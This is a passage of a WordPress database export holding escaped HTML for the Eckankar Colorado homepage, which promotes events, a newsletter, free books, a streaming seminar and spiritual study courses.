col-lg-4\" style=\"box-shadow: #cecece 0px 0px 0px 0px; border-bottom-right-radius: 0px;\">\r\n<div class=\"row\" style=\"padding-top: 0em; padding-bottom: 15px; border-bottom-left-radius: 0px;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\">\r\n<div style=\"border-top: 7px solid #cd8a0e; background-color: #fbeed0; text-align: center; padding: 15px; box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px; margin-top: -3px;\" class=\"\">\r\n<p class=\"\" style=\"text-align: center; margin: -40px 0px 25px;\">&nbsp;</p>\r\n<p class=\"\" style=\"font-size: 23px; font-weight: 600; text-align: center; color: rgba(62, 62, 62, 0.9);\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">Spiritual Connections</p>\r\n<p class=\"\" style=\"font-size: 17px; font-family: \'Open Sans\'; font-weight: 400;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">The purpose of this Meetup group is to provide a common meeting ground for all who have had, or would like to have, a life-changing spiritual experience.</p>\r\n<p>&nbsp;</p>\r\n<p class=\"\" style=\"text-align: center;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" tabindex=\"0\" href=\"https://www.meetup.com/find/?keywords=eckankar&amp;source=GROUPS&amp;distance=hundredMiles&amp;location=us--co--Denver\" target=\"_blank\" rel=\"noopener\">Join Us On Meetup®<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"col-md-4 col-sm-4 col-xs-12 col-lg-4\">\r\n<div class=\"row\" style=\"padding-top: 0em; padding-bottom: 15px;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\">\r\n<div style=\"border-top: 7px solid #cd8a0e; background-color: #f5f2eb; padding: 15px; box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px; margin-top: -3px;\" class=\"\">\r\n<p class=\"\" style=\"text-align: center; margin: -40px 0px 25px;\">&nbsp;</p>\r\n<p class=\"\" style=\"font-size: 23px; font-family: \'Raleway\'; font-weight: 600; text-align: center; color: rgba(62, 62, 62, 0.9);\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">Get Your Monthly Newsletter!</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 18px; font-weight: 600; font-family: \'Open Sans\';\" data-font-weight=\"600\" data-font-family=\"Open Sans\" data-font-style=\"\">Delivered right to your email inbox!</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 17px; margin-bottom: 26px; font-family: \'Open Sans\'; font-weight: 400;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Keep up with all the latest news and events from around the state.</p>\r\n<p class=\"\" style=\"text-align: center;\"><a class=\"\" style=\"font-weight: 400; font-family: \'Open Sans\'; font-size: 16px;\" href=\"https://eckankar-colorado.org/resa-faq/newsletter-subscription-members/\" data-font-weight=\"400\" data-font-family=\"Open Sans\" data-font-style=\"\">(Sunscribe to Initiates Newsletter Here)</a></p>\r\n<p class=\"\" style=\"text-align: center;\"><em>&nbsp;</em><a class=\"btn btn-color-1 btn-raised btn-rounded\" tabindex=\"0\" href=\"https://eckankar-colorado.org/newsletter-subscription-public/\"> Public&nbsp;Newsletter Signup<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"col-md-4 col-sm-4 col-xs-12 col-lg-4\">\r\n<div class=\"row\" style=\"padding-top: 0em; padding-bottom: 15px; box-shadow: #cecece 0px 0px 0px 0px inset;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\">\r\n<div style=\"border-top: 7px solid #cd8a0e; background-color: #fbeed0; padding: 15px; box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px; margin-top: -3px;\" class=\"\">\r\n<p class=\"\" style=\"text-align: center; margin: -40px 0px 25px;\">&nbsp;</p>\r\n<p class=\"\" style=\"font-family: \'Raleway\'; font-weight: 600; font-size: 23px; text-align: center; color: rgba(62, 62, 62, 0.9);\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">ECK Books Just For You</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 17px; margin-top: 6px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Find out how past lives, dreams, and<br>\r\nSoul Travel help you find God</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">This free-book offer includes two titles:<br>\r\n<strong><em>ECKANKAR—Ancient Wisdom for Today</em></strong> and <strong><em>Is Life a Random Walk?</em></strong></p>\r\n<p class=\"mod-reset\" style=\"text-align: center;\">&nbsp;</p>\r\n<p class=\"\" style=\"text-align: center;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" href=\"https://www.eckankar.org/freebook/wisdom/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Get Your ECK Books!<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"color-1-text-contrast bg-background-color tmpl-media-7 boldgrid-section dynamic-gridblock\">\r\n<div class=\"container\">\r\n<div class=\"row bg-background-color color1-background-color color-1-text-contrast\" style=\"padding-top: 67px; padding-bottom: 63px; box-shadow: rgba(0, 0, 0, 0.15) 0px 2px 8px; margin-bottom: 25px;\">\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 text-center col-lg-5\" style=\"box-shadow: #cecece 0px 0px 0px 0px inset; padding-right: 0em;\">\r\n<p>[embed] https://www.youtube.com/watch?v=s78XVcM7HWI[/embed]</p>\r\n</div>\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 col-lg-7\">\r\n<h2 class=\"\" style=\"font-family: \'Open Sans\'; font-weight: 600; box-shadow: #cecece 0px 0px 0px 0px inset; margin-top: -12px; color: #cd8a0e; font-size: 19px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Featured eck Video</h2>\r\n<p class=\"\" style=\"font-size: 29px; font-family: \'Open Sans\'; font-weight: 600; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">DO YOU LONG TO KNOW LIFE\'S PURPOSE?</p>\r\n<p class=\"\" style=\"font-size: 17px;\">You are Soul, an eternal, creative being. Unlimited. Divine.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">If you are ready for your next spiritual step, Eckankar’s Advanced Spiritual Living Courses offer a roadmap for your journey home to the heights of Self-Discovery and God-Discovery.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">You don’t need to change your lifestyle to live a rich spiritual life. Enlightenment comes in a natural way from the inside out.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">Ready to get your keys to spiritual transformation?</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>'),(242871,41184,'post_new_post_content','<div style=\"height: 178px; width: 100%; margin-top: -129px; z-index: 1; position: absolute; overflow: hidden;\"><svg viewBox=\"0 0 500 150\" preserveAspectRatio=\"none\" style=\"height: 100%; width: 100%;\"><path d=\"M-3.10,41.93 C187.08,206.73 329.85,-11.33 500.00,49.98 L500.00,150.00 L0.00,150.00 Z\" style=\"stroke: none; fill: #ffffff;\"></path></svg></div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p>&nbsp;</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 80px; border-width: 0px; padding-bottom: 55px;\">\r\n<div class=\"col-lg-1 col-md-12 col-sm-12 col-xs-12\">\r\n<p>&nbsp;</p>\r\n</div>\r\n<div class=\"col-lg-10 col-md-12 col-xs-12 col-sm-12 welcome-card\" style=\"border-width: 0px; background-color: #f8fbf8 !important; z-index: 2; margin-top: -235px;\">\r\n<p class=\"\" style=\"border-width: 0px; margin-left: auto; margin-right: auto; text-align: center; font-family: \'Raleway\'; font-size: 30px; color: #1e63bc; font-weight: 600;\" data-font-style=\"\" data-font-family=\"Raleway\" data-font-weight=\"600\">WELCOME TO ECKANKAR IN COLORADO!</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Does something inside you long to know life’s purpose? To make sense of the world around you?</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">You are Soul, an eternal, creative being. Unlimited. Divine.</p>\r\n<p class=\"\" style=\"font-size: 19px; text-align: center; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Eckankar is an active, individual, creative practice―a companion and road map for your journey home to the heights of Self-Discovery, God-Discovery, and beyond.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Come along and discover the most secret part of yourself.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 21px; color: rgba(61, 61, 61, 0.88); margin-bottom: 2px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><strong>Join us for the events below to discover your life as a spiritual adventure!</strong></p>\r\n</div>\r\n<div class=\"col-lg-1 col-md-12 col-sm-12 col-xs-12\"></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 20px; border-radius: 3px; padding-bottom: -15px;\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"\" style=\"font-size: 35px; color: #666666; text-align: center; font-weight: 500; box-shadow: #cecece 0px 0px 0px 0px inset; margin-bottom: 0px; font-family: Raleway;\" data-font-weight=\"500\" data-font-family=\"Raleway\" data-font-style=\"\">ECK SOUL ADVENTURE EVENTS</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"temp-gridblock-wrapper\"></div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 0px; padding-bottom: 6px;\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\">[MEC id=\"268667\"]</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"color-1-text-contrast bg-background-color tmpl-media-7 boldgrid-section dynamic-gridblock\">\r\n<div class=\"container\">\r\n<div class=\"row bg-background-color color1-background-color color-1-text-contrast\" style=\"padding-top: 36px; padding-bottom: 29px; margin-bottom: 25px;\">\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 text-center col-lg-6\" style=\"box-shadow: #cecece 0px 0px 0px 0px inset; padding-right: 0em;\">\r\n<p class=\"mod-reset\"><img class=\"alignnone wp-image-269414 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/11/streaming-web-promo-1.jpg\" alt=\"\" width=\"801\" height=\"445\" style=\"box-shadow: rgba(0, 0, 0, 0.45) 0px 25px 20px -20px;\"></p>\r\n<p class=\"\" style=\"font-style: normal; font-family: \'Open Sans\'; font-weight: 600; font-size: 18px; text-align: center; color: #ad7a05;\" data-font-style=\"normal\" data-font-weight=\"600\" data-font-family=\"Open Sans\">New to ECK? Guests register free!</p>\r\n<p class=\"\" style=\"text-align: center;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" href=\"https://www.eckankar.org/engage/eck-soul-adventure-seminars/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Get More Information and Register Now!<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 col-lg-6\" style=\"padding-right: 0em; padding-left: 2em;\">\r\n<h2 class=\"\" style=\"font-family: \'Open Sans\'; font-weight: 600; box-shadow: #cecece 0px 0px 0px 0px inset; margin-top: 5px; color: #cd8a0e; font-size: 19px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Now streaming through January 31, 2024</h2>\r\n<p class=\"\" style=\"font-size: 21px; font-family: \'Open Sans\'; font-weight: bold; color: #697085; line-height: 26px;\" data-font-family=\"Open Sans\" data-font-weight=\"700\" data-font-style=\"\">Experience the spiritual wonders of the 2023 ECKANKAR Soul Adventure Seminar from anywhere!</p>\r\n<p class=\"\" style=\"font-size: 17px; font-family: \'Open Sans\'; font-weight: 400;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Hear Sri Harold, the Mahanta, the Living ECK Master, speak to the world. His stories and wisdom open the heart to a higher love and show you practical ways to live the spiritual life to its fullest potential.</p>\r\n<p class=\"\" style=\"font-size: 17px; font-family: \'Open Sans\'; font-weight: 600;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Featured Events Include:</p>\r\n<ul class=\"\" style=\"font-size: 17px; font-family: \'Open Sans\'; font-weight: 400;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">\r\n	<li>Keynote talk, by Sri Harold Klemp, the spiritual leader of ECKANKAR;</li>\r\n	<li>All main-stage talks and performances; and</li>\r\n	<li>The 2023 digital Spiritual Art Gallery.</li>\r\n	<li>NEW ECKANKAR Soul Adventure Podcast—Animals Are Souls Too</li>\r\n	<li>ECK Soul Adventure Magazine—How Do We Soul Travel?</li>\r\n</ul>\r\n<p class=\"\" style=\"text-align: left; font-family: \'Open Sans\'; font-weight: 600; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Take your next spiritual step today.<br>\r\nYour life can truly be a Soul Adventure!</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 23px; padding-bottom: 0px;\">\r\n<div class=\"col-lg-12 col-md-12 col-sm-12 col-xs-12\">\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: Raleway; font-weight: 500; font-size: 36px; color: #697085;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">FOR YOU FROM ECKANKAR</p>\r\n</div>\r\n</div>\r\n<div class=\"row\" style=\"padding-bottom: 30px; padding-top: 10px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 10px 0;\"><img class=\"alignnone size-full wp-image-267648\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/01/hiker-path-1.jpg\" alt=\"\" width=\"744\" height=\"425\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 30px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">SPIRITUAL INSPIRATION</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 1px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">MORE ECK SOUL ADVENTURES</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">What inspires you?</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><a href=\"https://www.eckankar.org/eck-soul-adventure/\">ECKSoulAdventure.org</a> offers dynamic podcasts, compelling spiritual art-work, stories of encounters with the Divine, and so much more.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Explore all the lookout points on the Path of Spiritual Freedom.</p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"http://ECKSoulAdventure.org\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Experience your ECK Soul Adventure now<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\" style=\"border-width: 0px;\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"border-width: 0px; background-image: url(\'https://eckankar-colorado.org/wp-content/uploads/2023/02/teacher-bg.jpg\'); background-size: cover; background-position: 50% 50%;\" data-image-url=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/teacher-bg.jpg\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\" style=\"border-width: 0px; padding: 1em; padding-left: 50px;\">\r\n<p class=\"\" style=\"padding: 1em 0px 0em 0em; border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; color: #cd8a0e; font-size: 19px; margin-top: 1px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">ECK SOUL ADVENTURE GUIDE</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 1px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">SRI HAROLD KLEMP</p>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Spiritual teachers from an ancient lineage walk among us today—Adepts who have mastered the spiritual laws of life, embodying them in thought, word, and deed. Teachers of the highest order.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 17px;\">These are the ECK Masters.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; line-height: 27px; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Chief among them is the Mahanta, the Living ECK Master. As an inner and outer spiritual teacher, his role is to awaken the God-knowledge already within you.<br>\r\n<br>\r\n<a class=\"btn btn-color-1 btn-raised btn-rounded\" href=\"https://www.eckankar.org/eck-master/sri-harold-klemp/\" target=\"_blank\" rel=\"noopener\">Meet Sri Harold<i class=\"arrow right\"></i></a></p>\r\n<p>&nbsp;</p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"mod-reset\" style=\"border-width: 0px; padding-top: 0em;\"><img class=\"aligncenter wp-image-267933 size-full\" style=\"padding-top: 59px;\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/sri-harold-shaking-hands-transp-2.png\" alt=\"\" width=\"450\" height=\"388\"></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 0px; padding-top: 48px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 10px 0px; border-width: 0px;\"><img class=\"alignnone wp-image-267852 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/esc-sun-lensflare-2.jpg\" alt=\"\" width=\"464\" height=\"422\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 43px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">WANT TO GO DEEPER?</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 0px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">ADVANCED SPIRITUAL LIVING COURSES</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">This home-study program from Eckankar is a road map for your journey to Self-Discovery, God-Discovery, and beyond.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Understand the spiritual forces that shape the fabric of your everyday life. Find divine purpose in every moment.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">As Soul, you have the God-knowledge within you!</p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.eckankar.org/engage/advanced-spiritual-living/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Begin Your Journey<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 0px; padding-top: 48px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 4% 0% 2%; border-width: 0px; box-shadow: #cecece 0px 0px 0px 0px inset;\"><img class=\"aligncenter size-full wp-image-249746\" src=\"https://eckankar-colorado.org/wp-content/uploads/2020/01/Youth-in-ECK-sized.jpg\" alt=\"A series of 6 images showing youth in Eckankar\" width=\"555\" height=\"328\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 0px; box-shadow: #cecece 0px 0px 0px 0px inset;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">WHEN YOUR CHILD ASKS ABOUT GOD</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 0px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">HOW WILL YOU ANSWER?</p>\r\n<p class=\"\" style=\"font-size: 17px;\">Children often have profound spiritual experiences. Like many adults, they look for meaning in life and want to know the cause behind all causes.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">The ECK teachings offer spiritual understanding, tools, and insight that can help parents answer their children’s heartfelt questions.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">For more information about local youth activities please contact the <a href=\"https://eckankar-colorado.org/youth-and-family-contact-form/\" rel=\"noopener\">Colorado Youth &amp; Family Director</a></p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.adventuresineckparenting.org/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Explore ECKparents.org<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"color1-background-color color-1-text-contrast bg-background-color tmpl-media-11 boldgrid-section dynamic-gridblock\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 64px; padding-bottom: 20px;\">\r\n<div class=\"col-md-8 col-xs-12 col-sm-8 col-lg-12\">\r\n<h2 class=\"\" style=\"border-width: 0px; font-family: Raleway; font-weight: 500; color: #697085; text-align: center; font-size: 35px;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">Discover More About Eckankar</h2>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"tmpl-text-10 boldgrid-section dynamic-gridblock\" style=\"border-width: 0px;\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 30px; border-width: 0px;\"></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"tmpl-services-10 boldgrid-section dynamic-gridblock bg-background-color color1-background-color color-1-text-contrast\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-4 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"mod-reset\"><img class=\"aligncenter wp-image-269300 size-full bg-img alignnone bg-img-square\" style=\"box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px;\" src=\"https://demo2.cloudwp.dev/trial-22xytvtx/wp-content/uploads/2023/11/meetup-img-1-11-3-2023.jpg\" alt=\"\" width=\"359\" height=\"180\"></p>\r\n</div>\r\n<div class=\"col-lg-4 col-md-6 col-sm-12 col-xs-12\">\r\n<p class=\"\"><img class=\"alignnone wp-image-269326 size-full aligncenter bg-img bg-img-square\" style=\"box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px;\" src=\"https://demo2.cloudwp.dev/trial-22xytvtx/wp-content/uploads/2023/11/newsletter-img-2-11-3-2023.jpg\" alt=\"\" width=\"359\" height=\"180\"></p>\r\n</div>\r\n<div class=\"col-lg-4 col-md-4 col-sm-12 col-xs-12\">\r\n<p class=\"\"><img class=\"bg-img bg-img-square alignnone wp-image-269341 size-full\" style=\"box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px;\" src=\"https://demo2.cloudwp.dev/trial-22xytvtx/wp-content/uploads/2023/11/freebooks-img-5-11-3-2023.jpg\" alt=\"\" width=\"360\" height=\"180\"></p>\r\n</div>\r\n</div>\r\n<div class=\"row\" style=\"padding-top: 3px; padding-bottom: 15px;\">\r\n<div class=\"col-md-4 col-sm-4 col-xs-12 col-lg-4\" style=\"box-shadow: #cecece 0px 0px 0px 0px; border-bottom-right-radius: 0px;\">\r\n<div class=\"row\" style=\"padding-top: 0em; padding-bottom: 15px; border-bottom-left-radius: 0px;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\">\r\n<div style=\"border-top: 7px solid #cd8a0e; background-color: #fbeed0; text-align: center; padding: 15px; box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px; margin-top: -3px;\" class=\"\">\r\n<p class=\"\" style=\"text-align: center; margin: -40px 0px 25px;\">&nbsp;</p>\r\n<p class=\"\" style=\"font-size: 23px; font-weight: 600; text-align: center; color: rgba(62, 62, 62, 0.9);\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">Spiritual Connections</p>\r\n<p class=\"\" style=\"font-size: 17px; font-family: \'Open Sans\'; font-weight: 400;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">The purpose of this Meetup group is to provide a common meeting ground for all who have had, or would like to have, a life-changing spiritual experience.</p>\r\n<p>&nbsp;</p>\r\n<p class=\"\" style=\"text-align: center;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" tabindex=\"0\" href=\"https://www.meetup.com/find/?keywords=eckankar&amp;source=GROUPS&amp;distance=hundredMiles&amp;location=us--co--Denver\" target=\"_blank\" rel=\"noopener\">Join Us On Meetup®<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"col-md-4 col-sm-4 col-xs-12 col-lg-4\">\r\n<div class=\"row\" style=\"padding-top: 0em; padding-bottom: 15px;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\">\r\n<div style=\"border-top: 7px solid #cd8a0e; background-color: #f5f2eb; padding: 15px; box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px; margin-top: -3px;\" class=\"\">\r\n<p class=\"\" style=\"text-align: center; margin: -40px 0px 25px;\">&nbsp;</p>\r\n<p class=\"\" style=\"font-size: 23px; font-family: \'Raleway\'; font-weight: 600; text-align: center; color: rgba(62, 62, 62, 0.9);\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">Get Your Monthly Newsletter!</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 18px; font-weight: 600; font-family: \'Open Sans\';\" data-font-weight=\"600\" data-font-family=\"Open Sans\" data-font-style=\"\">Delivered right to your email inbox!</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 17px; margin-bottom: 26px; font-family: \'Open Sans\'; font-weight: 400;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Keep up with all the latest news and events from around the state.</p>\r\n<p class=\"\" style=\"text-align: center;\"><a class=\"\" style=\"font-weight: 400; font-family: \'Open Sans\'; font-size: 16px;\" href=\"https://eckankar-colorado.org/resa-faq/newsletter-subscription-members/\" data-font-weight=\"400\" data-font-family=\"Open Sans\" data-font-style=\"\">(Sunscribe to Initiates Newsletter Here)</a></p>\r\n<p class=\"\" 